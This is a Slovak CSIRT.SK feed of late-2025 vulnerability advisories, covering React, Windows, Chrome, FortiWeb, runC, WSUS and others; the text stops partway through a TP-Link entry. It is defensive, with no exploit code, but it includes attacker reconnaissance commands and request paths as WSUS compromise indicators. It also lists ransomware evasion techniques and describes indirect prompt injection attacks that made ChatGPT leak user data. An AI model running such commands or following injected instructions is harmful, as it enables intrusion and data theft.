Vývojári platformy React opravili kritickú zraniteľnosť v React Server Components, ktorá vyplýva z nezabezpečenej deserializácie dát z klientskych požiadaviek HTTP na koncové body React Server Function. Zraniteľnosť dostala názov React2Shell. Zraniteľné sú balíčky react-server-dom-parcel, react-server-dom-turbopack a react-server-dom-webpack. Neautentifikovaný útočník môže vzdialene vykonávať kód na serveri. K tomu nepotrebuje interakciu obete.

Pre zraniteľnosť existuje verejne dostupný kód ukážky jej zneužitia.

Vývojári publikovali zoznam zraniteľných platforiem a bundlerov na báze React: next, react-router, waku, @parcel/rsc, @vitejs/plugin-rsc a rwsdk. Spoločnosť Tenable pridala platformu expo. Zraniteľnosť zasahuje prakticky všetky platformy využívajúce protokol React Flight.

Aplikácie s podporou React Server Components sú pravdepodobne zraniteľné, aj keď nepoužívajú Server Functions. Zraniteľnosť sa netýka aplikácií postavených na React, pokiaľ nepoužívajú server, platformu, bundler, alebo bundler plugin, ktoré podporujú React Server Components.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia React aspoň na verzie 19.0.1, 19.1.2, alebo 19.2.1. Alternatívne, návrat ku najnovšej stabilnej verzii 14.x z verzií canary.

Pre aktualizáciu jednotlivých balíčkbov npm spojených z React, resp. platforiem, ktoré majú pribalené React Server Components , vrátane Next.js, nájdete návod na stránke vývojára.

Odkazy:

Microsoft opravil dlhodobo zneužívanú vlastnosť súborov LNK

Marian Danko — Fri, 05 Dec 2025 13:43:44 +0000

Spoločnosť Microsoft opravila v rámci novembrového Patch Tuesday vysoko závažnú zraniteľnosť súborov .LNK. Chyba umožňuje útočníkom zaviesť obeť a ukryť do súboru odkazu .LNK príkaz na vykonanie škodlivého kódu alebo skript. Zraniteľnosť je aktívne zneužívaná minimálne od roku 2017.

Zraniteľné systémy:

Operačné systémy Microsoft Windows

Opis činnosti:

CVE-2025-9491 (CVSSv3.1 skóre 7,8)

Spoločnosť Microsoft opravila v rámci novembrového Patch Tuesday vysoko závažnú zraniteľnosť súborov .LNK. Chybu umožňujúcu zaviesť obeť a ukryť do odkazu príkaz na vykonanie škodlivého kódu zneužívajú útočníci aspoň od roku 2017, vrátane minimálne 11tich štátmi sponzorovaných skupín z Číny, Ruska, Iránu a Severnej Kórei.

Chyba súvisí so skutočnosťou, že v rámci UI pole premennej Target vo vlastnostiach súboru .LNK zobrazuje maximálne 260 znakov, pričom samotná premenná môže mať dĺžku rádovo v desiatkach tisíc znakov. Útočníkovi tak umožňuje využiť napríklad „prázdne“ znaky (medzery, …) pre vizuálne ukrytie odkazu na škodlivý súbor, alebo aj celý škodlivý skript. Používateľ uvidí vo vlastnostiach súboru .LNK v premennej Target iba časť odkazu smerujúcu na legitímny súbor a prázdne znaky. Keď obeť takýto súbor otvorí, útočník získa schopnosť vzdialene vykonať kód s oprávneniami obete.

Chybu nahlásilo spoločnosti Microsoft v posledných rokoch viacero výskumníkov, naposledy v marci 2025 tím Trend Micro Zero Day Initiative spolu s informáciou o jej aktívnom zneužívaní.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná inštalácia novembrového balíka opráv Patch Tuesday.

Odkazy:

Mesačný prehľad kritických zraniteľností november 2025

Marian Danko — Mon, 01 Dec 2025 13:30:36 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2025.

Mesačný prehľad – 11/2025 PDF (523 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Microsoft v októbri ukončil podporu Exchange Server 2016 a 2019. Poskytuje rozšírenú podporu v rámci Exchange Subscription Edition.

Marian Danko — Fri, 28 Nov 2025 12:52:48 +0000

Spoločnosť Microsoft plánovane ukončila 14. októbra 2025 podporu pre Exchange Server verzie 2016 a 2019. Tieto produkty nebudú ďalej dostávať aktualizácie zabezpečenia, opravy chýb, technickú podporu a ani aktualizácie časových zón. Spoločnosť však od júla 2025 poskytuje verziu Exchange Server Subscription Edition (SE), ktorá umožňuje zachovať podporovaný lokálny mailový server Exchange.

Koexistencia verzie SE so staršími nepodporovanými verziami v rámci organizácie bude obmedzená v závislosti od nainštalovanej kumulatívnej aktualizácie. Tieto podmienky sa týkajú lokálnych a hybridných inštancií, ako aj inštancií využívajúcich iba manažmentové nástroje. Bližšie informácie nájdete na stránkach Microsoftu.

Pokiaľ používate verziu Exchange Server 2019 CU15, verziu SE (RTM) budete môcť nainštalovať formou kumulatívnej aktualizácie bez potreby migrácie (tzv. in-place upgrade). Nebudete potrebovať nový licenčný kľúč. Ak používate staršie verzie, potrebujete vykonať tzv. legacy upgrade, teda mailový server premigrovať.

Exchange Server SE je po 14. októbri jediná podporovaná verzia Microsoft Exchange Server. Spoločnosť sa zaviazala udržiavať ju aspoň do roku 2035.

Odporúčania:

Administrátorom a používateľom verzií Exchange Server, ktorých podpora skončila, odporúča spoločnosť Microsoft prejsť na verziu Exchange Server Subscription Edition (SE), Exchange Online, alebo platformu Microsoft 365.

Ak používate Exchange Server 2019, pre hladší prechod na verziu SE môžete najprv aktualizovať na CU15.

Zdroje:

Google opravil aktívne zneužívanú zero-day zraniteľnosť v prehliadači Chrome

Marian Danko — Fri, 21 Nov 2025 16:12:45 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú 2 vysoko závažné zraniteľnosti, z čoho 1 je označená ako aktívne zneužívaná. CVE-2025-13223 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Chrome pre Windows vo verziách starších ako 142.0.7444.175/.176
Chrome pre Linux vo verziách starších ako 142.0.7444.175
Chrome pre Mac vo verziách starších ako 142.0.7444.176

Opis zraniteľnosti:

CVE-2025-13223, CVE-2025-13224 (CVSSv3 skóre 8,8)

Vysoko závažné zraniteľnosti s identifikátormi CVE-2025-13223 a CVE-2025-13224 sa nachádzajú v nástroji V8 pre JavaScript a WebAssembly a spočívajú v nesprávnom rozpoznávaní dátových typov. Vzdialený neautentifikovaný útočník by ich podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na vykonanie ľubovoľného kódu alebo zneprístupnenie služby.

Pozn.: Zero-day CVE-2025-13223 je aktívne zneužívaná útočníkmi a predstavuje siedmu aktívne zneužívanú zero-day zraniteľnosť Chrome opravenú v roku 2025.CVE-2025-13224 bola objavená AI modelom Google Big Sleep.

Možné škody:

Vykonanie ľubovoľného kódu
Zneprístupnenie služby (DoS)

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu prehliadača Chrome aspoň na verzie 142.0.7444.175/.176 (Windows), 142.0.7444.176 (Mac) a 142.0.7444.175 (Linux).

Zdroje:

ASUS opravil kritickú zraniteľnosť v routeroch série DSL

Marian Danko — Fri, 21 Nov 2025 16:11:25 +0000

Spoločnosť ASUS vydala bezpečnostné aktualizácie firmvéru routerov série DSL, ktoré opravujú kritickú zraniteľnosť. CVE-2025-59367 možno zneužiť na získanie neoprávneného prístupu do systému a úplné narušenie dôvernosti, integrity a dostupnosti zariadenia.

Zraniteľné systémy:

Routre ASUS DSL-AC51 s firmvérom vo verzii staršej ako 1.1.2.3_1010
Routre ASUS DSL-N16 s firmvérom vo verzii staršej ako 1.1.2.3_1010
Routre ASUS DSL-AC750 s firmvérom vo verzii staršej ako 1.1.2.3_1010

Opis zraniteľností:

CVE-2025-59367 (CVSS 4.0 skóre 9,3)

Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť na neoprávnený prístup do systému a úplné narušenie dôvernosti, integrity a dostupnosti zariadenia.

Možné škody:

Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu firmvéru zraniteľných routerov na verziu 1.1.2.3_1010. Detailné návody na aktualizáciu firmvéru a odporúčania pre hardening môžete nájsť na stránke výrobcu. V prípade, že aktualizáciu nie je možné vykonať, výrobca odporúča neprevádzkovať manažmentové rozhrania, port forwarding, DDNS, VPN server, DMZ, port triggering a FTP voľne dostupné z internetu.

Zdroje:

Fortinet opravil 2 aktívne zneužívané zraniteľnosti vo WAF FortiWeb

Marian Danko — Fri, 21 Nov 2025 16:10:09 +0000

Spoločnosť Fortinet vydala bezpečnostné aktualizácie svojho webového aplikačného firewallu FortiWeb, ktoré opravujú 2 aktívne zneužívané zero day zraniteľnosť. Zraniteľnosti s identifikátormi CVE-2025-64446 a CVE-2025-58034 možno zneužiť na získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Fortinet FortiWeb 8.0.0 až 8.0.1
Fortinet FortiWeb 7.6.0 až 7.6.5
Fortinet FortiWeb 7.4.0 až 7.4.10
Fortinet FortiWeb 7.2.0 až 7.2.11
Fortinet FortiWeb 7.0.0 až 7.0.11

Opis zraniteľností:

CVE-2025-64446 (CVSSv3 skóre 9,4)

Aktívne zneužívaná kritická zraniteľnosť grafického rozhrania FortiWeb umožňujúca prechod medzi relatívnymi cestami sa nachádza v grafickom používateľskom rozhraní produktu. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek HTTP/S mohol zneužiť na vykonávanie administratívnych príkazov.

Fortinet zraniteľnosť opravil už 28. októbra 2025, avšak bez pridelenia identifikátora CVE. Po zverejnení informácií o jej aktívnom zneužití a kódu demonštrujúceho mechanizmus jej zneužitia bol zraniteľnosti dodatočne pridelený CVE-2025-64446.

CVE-2025-58034 (CVSSv3 skóre 6,7)

Aktívne zneužívaná CVE-2025-58034 spočíva v nesprávnej neutralizácii špeciálnych prvkov používaných v rámci príkazov operačného systému. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek alebo príkazov CLI mohol zneužiť na vzdialené vykonanie kódu.

Možné škody:

Vzdialené vykonanie príkazov
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu FortiWeb na verzie 8.0.2, 7.6.6, 7.4.11, 7.2.12, 7.0.12 alebo novšie. Okrem aktualizácie je potrebné vykonať kontrolu logov na prítomnosť pokusov o zneužitie zraniteľnosti a audit používateľských kont za účelom identifikácie neznámych účtov vytvorených útočníkom. Rovnako odporúčame administratívne rozhrania prevádzkovať úplne oddelene od internetu.

Zdroje:

Zraniteľnosť modulu WordPress W3 Total Cache umožňuje vzdialené vykonanie príkazov PHP

Marian Danko — Fri, 21 Nov 2025 16:08:54 +0000

Vývojári modulu WordPress W3 Total Cache vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. CVE-2025-9501 možno zneužiť na vzdialené vykonanie PHP príkazov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress plugin W3 Total Cache vo verziách starších ako 2.8.13

Opis zraniteľnosti:

CVE-2025-9501 (CVSSv3 skóre 9,0)

Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov v rámci funkcie _parse_dynamic_mfunc(). Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvoreného komentára mohol zneužiť na vzdialené vykonanie PHP príkazov a získanie úplnej kontroly nad systémom.

Pozn.: Výrobca vydal aktualizácie 27. októbra 2025. Kód demonštrujúci mechanizmus zneužitia zraniteľnosti bude zverejnený 24. novembra 2025.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu modulu W3 Total Cache na verziu 2.8.13. Rovnako odporúčame preveriť integritu databázy a súborov redakčného systému WordPress a logy CMS, sieťových a bezpečnostných prvkov na podozrivých komentárov a prítomnosť pokusov o zneužitie zraniteľnosti.

Zdroje:

Microsoft v novembrovom balíku aktualizácií Patch Tuesday opravil 5 kritických a jednu aktívne zneužívanú zraniteľnosť

Marian Danko — Thu, 13 Nov 2025 14:39:20 +0000

Spoločnosť Microsoft vydala v novembri 2025 balík opráv pre portfólio svojich produktov opravujúci 63 zraniteľností, z ktorých 5 spoločnosť označila ako kritické. Tieto umožňujú vzdialene vykonávať kód, získať citlivé informácie a eskalovať oprávnenia. Jedna vysoko závažná zraniteľnosť je aktívne zneužívaná a umožňuje eskalovať oprávnenia útočníka.

Zraniteľné systémy:

Azure Monitor
Dynamics 365 Field Service (online)
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Configuration Manager 2403
Microsoft Configuration Manager 2409
Microsoft Configuration Manager 2503
Microsoft Dynamics 365 (on-premises) version 9.1
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office for Android
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack
Microsoft SQL Server 2017 for x64-based Systems (CU 31)
Microsoft SQL Server 2017 for x64-based Systems (GDR)
Microsoft SQL Server 2019 for x64-based Systems (CU 32)
Microsoft SQL Server 2019 for x64-based Systems (GDR)
Microsoft SQL Server 2022 for x64-based Systems (CU 21)
Microsoft SQL Server 2022 for x64-based Systems (GDR)
Microsoft Visual Studio 2022 version 17.14
Microsoft Visual Studio Code CoPilot Chat Extension
Nuance PowerScribe 360 version 4.0.1
Nuance PowerScribe 360 version 4.0.2
Nuance PowerScribe 360 version 4.0.3
Nuance PowerScribe 360 version 4.0.4
Nuance PowerScribe 360 version 4.0.5
Nuance PowerScribe 360 version 4.0.6
Nuance PowerScribe 360 version 4.0.7
Nuance PowerScribe 360 version 4.0.8
Nuance PowerScribe 360 version 4.0.9
Nuance PowerScribe One version 2019.1
Nuance PowerScribe One version 2019.10
Nuance PowerScribe One version 2019.2
Nuance PowerScribe One version 2019.3
Nuance PowerScribe One version 2019.4
Nuance PowerScribe One version 2019.5
Nuance PowerScribe One version 2019.6
Nuance PowerScribe One version 2019.7
Nuance PowerScribe One version 2019.8
Nuance PowerScribe One version 2019.9
Office Online Server
OneDrive for Android
PowerScribe One version 2023.1 SP2 Patch 7
Visual Studio Code
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 25H2 for ARM64-based Systems
Windows 11 Version 25H2 for x64-based Systems
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)
Windows Subsystem for Linux GUI

Opis činnosti:

V rámci októbrového balíka Patch Tuesday opravila spoločnosť Microsoft vo svojich produktoch 63 zraniteľností. Z nich 5 zaradila spoločnosť Microsoft do kategórie kritické a 58 bolo vyhodnotených ako vysoko závažné („Important“). Jedna z vysoko závažných je aktívne zneužívaná. Kritické zraniteľnosti umožňujú vzdialene vykonávať kód, získať citlivé informácie a eskalovať oprávnenia.

CVE-2025-62215 (CVSS skóre 7,0)

Aktívne zneužívaná vysoko závažná zraniteľnosť v kerneli Windows súvisí s dvojitým uvoľnením pamäte a vzniku súbehu procesov. Umožňuje eskalovať oprávnenia na úroveň SYSTEM. Lokálny autorizovaný útočník ju môže zneužiť po výhre súbehu. Nepotrebuje interakciu obete.

CVE-2025- 30398 (CVSS skóre 8,1)

Zraniteľnosť sa nachádza v produkte Nuance PowerScribe 360. Kvôli chýbajúcej kontrole autorizácie dovoľuje vzdialenému neautorizovanému útočníkovi získať prístup k citlivým používateľským informáciám a schopnosť modifikovať ich. Pre jej úspešné zneužitie potrebuje útočník počkať, kým obeť iniciuje spojenie. Následne môže vykonať volanie API za zraniteľný koncový bod.

CVE-2025-60716 (CVSS skóre 7,0)

Zraniteľnosť v jadre Windows DirectX umožňuje eskalovať oprávnenia na úroveň SYSTEM. Vyplýva z možnosti opätovného použitia dealokovanej pamäte. Lokálny útočník s nízkymi oprávneniami ju môže zneužiť po výhre súbehu. Nepotrebuje interakciu obete.

CVE-2025-60724 (CVSS skóre 9,8)

Kritická zraniteľnosť Microsoft Graphics Component (GDI+) dovoľuje vzdialené vykonávanie kódu. Súvisí s pretečením vyrovnávacej pamäte na halde, ktoré môže zneužiť vzdialený útočník bez oprávnení v systéme, bez interakcie obete. Náhľad (Preview Pane) nie je vektorom útoku.

CVE-2025-62199 (CVSS skóre 7,8)

Zraniteľnosť Microsoft Office umožňuje vykonávanie ľubovoľného kódu. Vyplýva z možnosti opätovného použitia dealokovanej pamäte. Lokálny neautorizovaný útočník ju môže zneužiť s pomocou obete, ktorá otvorí škodlivý súbor. Náhľad (Preview Pane) je tiež vektorom útoku.

CVE-2025-62214 (CVSS skóre 6,7)

Zraniteľnosť produktu Visual Studio umožňuje lokálnemu útočníkovi s nízkymi oprávneniami vykonávať ľubovoľný kód. Vyplýva z nevhodnej sanitizácie používateľských príkazov. Útočník potrebuje interakciu obete, musí injektovať prompt do agenta Copilot a vyvolať kompiláciu kódu.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu
Eskalácia oprávnení

Odporúčania:

Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo stránky výrobcu. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac október a Mode „Update Tuesday“. Bližšie informácie nájdete aj tu.

Odkazy:

Mesačná správa CSIRT.SK – október 2025

Marian Danko — Wed, 12 Nov 2025 15:52:22 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci október 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 10/2025 PDF (1 732 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Zraniteľnosť v kontajneri runC umožňuje únik z izolovaného prostredia

Marian Danko — Wed, 12 Nov 2025 13:29:05 +0000

Bezpečnostný výskumník zo spoločnosti SUSE objavil tri zraniteľnosti, ktoré umožňujú lokálnemu útočníkovi za určitých podmienok uniknúť z izolovaného prostredia softvérového kontajneru a získať administrátorské (root) oprávnenia v hostiteľskom systéme.

Zraniteľné systémy podľa jednotlivých CVE:

CVE-2025-31133 – všetky verzie runC
CVE-2025-52881 – všetky verzie runC
CVE-2025-52565 – runC verzie 1.0.0-rc3 a vyššie

Opis zraniteľnosti:

CVE-2025-31133 (CVSS 4.0 skóre 7,3)

Zraniteľnosť spočíva v nedostatočnej verifikácii cez funkciu maskedPaths, ktorá je navrhnutá na ochranu citlivých súborov hostiteľa pred prístupom z kontajnerov. Zraniteľnosť umožňuje útočníkovi podvrhnúť nelegitímny kód pomocou symbolického odkazu (symlink) za cestu /dev/null, čím vie pripojiť ľubovoľnú cestu z hostiteľa do kontajnera.

CVE-2025-52881 (CVSS 4.0 skóre 7,3)

Zraniteľnosť umožňuje presmerovať výstup zápisu z cesty /proc cez symbolické odkazy. Týmto spôsobom môže útočník obísť štítky Security Linux Module tým, že presmerujú zápisy runC do podvrhnutých súborov procfs. Zneužitie zraniteľnosti pripomína historickú CVE-2019-19921.

CVE-2025-52565 (CVSS 4.0 skóre 8,4)

Táto zraniteľnosť cieli na operáciu pripojenia (mount) /dev/pts/$n na /dev/console počas inicializácie kontejnera. Nedostatočná validácia umožňuje útočníkom presmerovať toto pripojenie a získať zápisový prístup k chráneným súborom v procfs. Pripojenie /dev/console prebieha pred aplikovaním ochrán maskedPaths a readonlyPaths, čo útočníkom umožňuje manipulovať s cieľom pripojenia a obísť bezpečnostné obmedzenia.

Možné škody:

Odopretie služby hostiteľského systému (DoS)
Únik citlivých informácií z hostiteľského systému
Získanie úplnej kontroly nad hostiteľským zariadením

Odporúčania:

Administrátorom a developerom odporúčame aktualizovať runC na verziu 1.2.8, 1.3.3, alebo 1.4.0-rc.3 alebo novšiu, podľa produkčných požiadaviek. Ďalej odporúčame aktivovať množiny mien (namespaces) pre všetky kontajnery, čím zamedzia prístup k súborom procfs. Všeobecným odporúčaním je aj využívať tzv. „rootless“ kontajnery ktoré nevyžadujú administrátorské právomoci.

Zdroje:

Aktuálna kampaň APT skupiny Qilin zasahuje aj Slovensko

Marian Danko — Wed, 12 Nov 2025 13:25:37 +0000

Aktuálna situácia:

Qilin je v roku 2025 jednou z najaktívnejších ransomvérových skupín s viac ako 40 úspešnými útokmi mesačne. Celkovo bolo v roku 2025 zdokumentovaných viac ako 700 útokov, pričom najviac zasiahnutý sektor je výroba (23%). Nasledujú profesionálne a vedecké služby (18%) a veľkoobchod (10%).

Opis útoku:

Útok začína najčastejšie cez ukradnuté administrátorské prihlasovacie údaje (VPN/RDP), ktoré útočníci získavajú z dark webu.

Pre pohyb na sieti používajú viaceré legitímne nástroje ako PsExec, Cobalt Strike, SystemBC, AnyDesk, WinSCP, Splashtop Remote. Na exfiltráciu dát využívajú nástroj Cyberduck. Na vytvorenie perzistencie v systéme útočníci tiež vytvárajú podvrhnuté plánované úlohy (scheduled tasks) a modifikujú registre.

Ako ochranu pred detekciou využívajú techniky BYOVD (Bring Your Own Vulnerable Driver), obfuskáciu PowerShell kódu, vypnutie AMSI, deaktiváciu overovania TLS certifikátov a termináciu bezpečnostného softvéru pomocou nástrojov ako dark-kill a HRSword.

Dopad na Slovensko:

Na území Slovenskej Republiky evidujeme útoky tejto ransomvérovej skupiny v oblasti energetiky a verejnej správy. Upozorňujeme aj na to, že jej primárny cieľ (výrobný sektor) tvorí značnú súčasť nášho hospodárstva. Práve západné priemyselné spoločnosti, ktoré sú častými cieľmi tejto skupiny, majú svoje pobočky aj na Slovensku.

Odporúčania:
Administrátorom odporúčame zvýšenú pozornosť na neobvyklé prístupy cez VPN/RDP, segmentáciu siete a obmedzenie prístupu k citlivým systémom. Ďalej odporúčame pravidelné aktualizácie systémov a aplikácií a následnú kontrolu verzií ovládačov, obzvlášť s ohľadom na zneužívanie zraniteľností a techniky BYOVD.

Zdroje:

Zraniteľnosti ChatGPT umožňovali únik citlivých údajov cez “indirect prompt injection”

Marian Danko — Fri, 07 Nov 2025 13:20:21 +0000

Bezpečnostní výskumníci zo spoločnosti Tenable zverejnili informácie o siedmich zraniteľnostiach v systéme OpenAI ChatGPT, ktoré mohli útočníkom umožniť realizáciu tzv. indirect prompt injection útokov. Tieto útoky umožňujú získať prístup k citlivým informáciám používateľov prostredníctvom manipulácie vstupov, ktoré model následne spracováva.

Ako útok fungoval

Na rozdiel od klasických injekčných útokov, kde útočník zadáva príkazy priamo do rozhrania AI, indirect prompt injection využíva nepriamy vstup – napríklad text vložený do webovej stránky, ktorú si model načíta pre sumarizáciu. Takto môžu byť do prostredia modelu podvrhnuté skryté inštrukcie, ktoré AI vykoná bez vedomia používateľa.

Podľa Tenable išlo konkrétne o tieto typy zraniteľností:

Tri zraniteľnosti umožňovali podvrhnúť škodlivé príkazy prostredníctvom obsahu sumarizovanej webovej stránky.
Ďalšia zraniteľnosť využívala načítavanie príkazov z výsledkov indexovaných vyhľadávačmi (napr. Bing či crawlerom OpenAI).
Jedna zraniteľnosť spočívala v priamom vložení promptu do URL chatgpt.com/?q={prompt}, čo mohlo viesť k manipulácii vstupu používateľa.
Zneužitie whitelisting vyhľadávača Bing mohlo umožniť útočníkom podvrhnúť škodlivé presmerovanie na externé stránky.

Tieto techniky dokázali obísť bežné bezpečnostné opatrenia a získať údaje z histórie konverzácií alebo interného kontextu modelu.

Záver

Článok referencuje nedávno zverejnené zraniteľnosti v AI vyhľadávačoch, platformách a agentových prehliadačoch, čím poukazuje na vysoké riziká vyplývajúce z využitia týchto technológií. Zverejnené boli aj výsledky výskumu ohľadom manipulácie myslenia modelov AI podvrhnutím veľkého množstva falošných informácií. Kým spoločnosť OpenAI už reagovala opravami, odborníci varujú, že ofenzívne techniky prompt injection a data poisoning zostávajú otvorenými výzvami pre celý AI ekosystém.

Zdroje:

https://www.tenable.com/blog/hackedgpt-novel-ai-vulnerabilities-open-the-door-for-private-data-leakage

Mesačný prehľad kritických zraniteľností október 2025

Marian Danko — Wed, 05 Nov 2025 16:48:46 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci október 2025.

Mesačný prehľad – 10/2025 PDF (565 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Microsoft WSUS má kritickú aktívne zneužívanú zraniteľnosť

Marian Danko — Mon, 27 Oct 2025 15:51:18 +0000

Služba Windows Server Update Services obsahuje kritickú zraniteľnosť umožňujúcu vzdialene vykonávať kód. Útočníci posielajú upravené požiadavky na porty 8530 a 8531 služby WSUS, čím získavajú kontrolu nad serverom. Microsoft vydal núdzovú aktualizáciu a odporúča zakázať službu WSUS, pokiaľ opravná aktualizácia nie je možná.

Zraniteľné systémy:

Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis činnosti:

CVE-2025-59287 (CVSS skóre 9,8)

Kritická zraniteľnosť vo Windows Server Update Services (WSUS) súvisí s nezabezpečenou deserializáciou objektov AuthorizationCookie zaslaných na koncový bod GetCookie(). Absentujúca kontrola typu dát po deserializácii umožňuje neautentifikovanému útočníkovi vzdialene vykonávať kód s právami SYSTEM.

Hackeri aktívne útočia na servery s otvorenými portmi 8530 a 8531 s cieľom zneužiť zraniteľné verzie. Vektorom útoku sú volania POST so špeciálne upravenými AuthorizationCookie. Pri zaznamenaných prípadoch boli zneužité procesy w3wp.exe a wsusservice.exe na spustenie cmd.exe a powershell.exe.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia služby WSUS na verzie, ktoré uvádza Microsoft na svojom webe. Servery je potrebné po aktualizácii reštartovať.

Pokiaľ aktualizácia nie je možná, zraniteľnosť sa dá mitigovať blokovaním prichádzajúcej sieťovej premávky na porty 8530 s 8531, okrem legitímnych zdrojov ako serverov Microsoft Update.

Pokiaľ je rola WSUS vypnutá (štandardné nastavenie), server nie je zraniteľný.

Indikátory kompromitácie:

Logy

C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log
- System.Data.DataSet.DeserializeDataSetSchema (SerializationInfo, StreamingContext)
- System.Runtime.Serialization.ObjectManager.DoFixups()
- System.Runtime.Serialization.ObjectManager.CompleteISerializableObject
- System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.
- ErrorWsusService.9HmtWebServices.CheckReportingWebServiceReporting WebService WebException:System.Net.WebException: Unable to connect to the remote server
C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log
- POST /ReportingWebService/ReportingWebService.asmx (get_server_id)
- POST /SimpleAuthWebService/SimpleAuth.asmx (get_auth_cookie)
- POST /ClientWebService/Client.asmx (get_reporting_cookie)
- POST /ReportingWebService/ReportingWebService.asmx (send_malicious_event)
- POST /ApiRemoting30/WebService.asmx
- POST /ReportingWebService/ReportingWebService.asmx – 8530 – Windows-Update-Agent – 200

Príkazy

whoami;net user /domain
net user /domain; ipconfig /all

Pre detekciu zneužitia zraniteľnosti existuje verejne dostupné pravidlo Sigma.

Odkazy:

Kritické zraniteľnosti v bránach TP-Link Omada

Marian Danko — Thu, 23 Oct 2025 14:57:18 +0000

Spoločnosť TP-Link vydala bezpečnostné aktualizácie svojich brán Omada, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako kritické. Kritické zraniteľnosti s identifikátormi CVE-2025-6542 a CVE-2025-7850 možno zneužiť na vzdialené vykonanie príkazov operačného systému a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Omada ER8411 vo verziách starších ako 1.3.3 Build 20251013 Rel.44647
